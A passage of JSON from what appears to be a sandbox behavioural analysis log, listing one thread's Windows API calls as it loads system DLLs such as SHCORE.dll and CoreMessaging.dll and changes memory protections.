"FileName", "value": "C:\\Windows\\System32\\CoreUIComponents.dll" } ], "repeated": 0, "id": 455 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aeb5c", "parentcaller": "0x771ae8a8", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\CoreUIComponents.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 456 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771aeb99", "parentcaller": "0x771ae8a8", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002b0" } ], "repeated": 0, "id": 457 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72ea0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0027f000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 458 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x730bb000" }, { "name": "ModuleName", "value": "CoreUIComponents.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 459 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 460 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 461 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x7300e000" }, { "name": "ModuleName", "value": "CoreUIComponents.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 462 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "ntmarta.dll" } ], "repeated": 0, "id": 463 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "CoreMessaging.dll" } ], "repeated": 0, "id": 464 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": false, "return": "0xffffffffc0000034", "pretty_return": "OBJECT_NAME_NOT_FOUND", "arguments": [ { "name": "SectionHandle", "value": "0x00000000" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "wintypes.dll" } ], "repeated": 2, "id": 465 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00734000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 466 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a1568", "parentcaller": "0x7719f2d9", "category": "process", "api": "NtOpenSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b8" }, { "name": "DesiredAccess", "value": "0x0000000d" }, { "name": "ObjectAttributes", "value": "SHCORE.dll" } ], "repeated": 0, "id": 467 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b8" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75bb0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00087000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 468 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c2c000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 469 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 470 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 471 }, { "timestamp": "2025-02-27 23:34:15,722", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c29000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 472 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x7719f359", "parentcaller": "0x771a2838", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b8" } ], "repeated": 0, "id": 473 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebed", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 474 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebf5", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 475 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\CoreMessaging.dll" } ], "repeated": 0, "id": 476 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb5c", "parentcaller": "0x771ae8a8", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\CoreMessaging.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 477 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb99", "parentcaller": "0x771ae8a8", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002b0" } ], "repeated": 0, "id": 478 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x738a0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x0009b000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 479 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73924000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 480 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 481 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 482 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73906000" }, { "name": "ModuleName", "value": "CoreMessaging.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 483 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebed", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 484 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebf5", "parentcaller": "0x771ae8a8", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 485 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\ntmarta.dll" } ], "repeated": 0, "id": 486 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb5c", "parentcaller": "0x771ae6d2", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\ntmarta.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 487 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb99", "parentcaller": "0x771ae6d2", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002b0" } ], "repeated": 0, "id": 488 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73a30000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x00029000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 489 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73a55000" }, { "name": "ModuleName", "value": "ntmarta.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 490 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 491 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 492 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x73a53000" }, { "name": "ModuleName", "value": "ntmarta.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 493 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebed", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 494 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebf5", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 495 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\CoreMessaging.dll" } ], "repeated": 0, "id": 496 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\WinTypes.dll" } ], "repeated": 0, "id": 497 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb5c", "parentcaller": "0x771ae6d2", "category": "filesystem", "api": "NtOpenFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileHandle", "value": "0x000002b0" }, { "name": "DesiredAccess", "value": "0x00100021", "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE" }, { "name": "FileName", "value": "C:\\Windows\\System32\\WinTypes.dll" }, { "name": "ShareAccess", "value": "5", "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE" } ], "repeated": 0, "id": 498 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aeb99", "parentcaller": "0x771ae6d2", "category": "process", "api": "NtCreateSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "DesiredAccess", "value": "0x0000000d", "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE" }, { "name": "ObjectAttributes", "value": "" }, { "name": "FileHandle", "value": "0x000002b0" } ], "repeated": 0, "id": 499 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a16fc", "parentcaller": "0x771a1867", "category": "process", "api": "NtMapViewOfSection", "status": true, "return": "0x00000000", "arguments": [ { "name": "SectionHandle", "value": "0x000002b4" }, { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72dc0000" }, { "name": "SectionOffset", "value": "0x00000000" }, { "name": "ViewSize", "value": "0x000dd000" }, { "name": "Win32Protect", "value": "0x00000080", "pretty_value": "PAGE_EXECUTE_WRITECOPY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 500 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a02af", "parentcaller": "0x771a0a34", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72e84000" }, { "name": "ModuleName", "value": "wintypes.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 501 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2331", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 502 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b23a8", "parentcaller": "0x771b2361", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x77279000" }, { "name": "ModuleName", "value": "ntdll.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00003000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 503 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771b26e6", "parentcaller": "0x7719b730", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x72e82000" }, { "name": "ModuleName", "value": "wintypes.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "OldAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 504 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebed", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b4" } ], "repeated": 0, "id": 505 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771aebf5", "parentcaller": "0x771ae6d2", "category": "system", "api": "NtClose", "status": true, "return": "0x00000000", "arguments": [ { "name": "Handle", "value": "0x000002b0" } ], "repeated": 0, "id": 506 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x77190947", "parentcaller": "0x7719064f", "category": "process", "api": "NtAllocateVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x00736000" }, { "name": "RegionSize", "value": "0x00002000" }, { "name": "Protection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 507 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a260c", "parentcaller": "0x771a2516", "category": "filesystem", "api": "NtQueryAttributesFile", "status": true, "return": "0x00000000", "arguments": [ { "name": "FileName", "value": "C:\\Windows\\System32\\WinTypes.dll" } ], "repeated": 1, "id": 508 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a1142", "parentcaller": "0x7718e5b3", "category": "process", "api": "NtProtectVirtualMemory", "status": true, "return": "0x00000000", "arguments": [ { "name": "ProcessHandle", "value": "0xffffffff" }, { "name": "BaseAddress", "value": "0x75c29000" }, { "name": "ModuleName", "value": "SHCORE.dll" }, { "name": "NumberOfBytesProtected", "value": "0x00001000" }, { "name": "MemoryType", "value": "0x00000000" }, { "name": "NewAccessProtection", "value": "0x00000002", "pretty_value": "PAGE_READONLY" }, { "name": "OldAccessProtection", "value": "0x00000004", "pretty_value": "PAGE_READWRITE" }, { "name": "StackPivoted", "value": "no" } ], "repeated": 0, "id": 509 }, { "timestamp": "2025-02-27 23:34:15,816", "thread_id": "3892", "caller": "0x771a131c", "parentcaller": 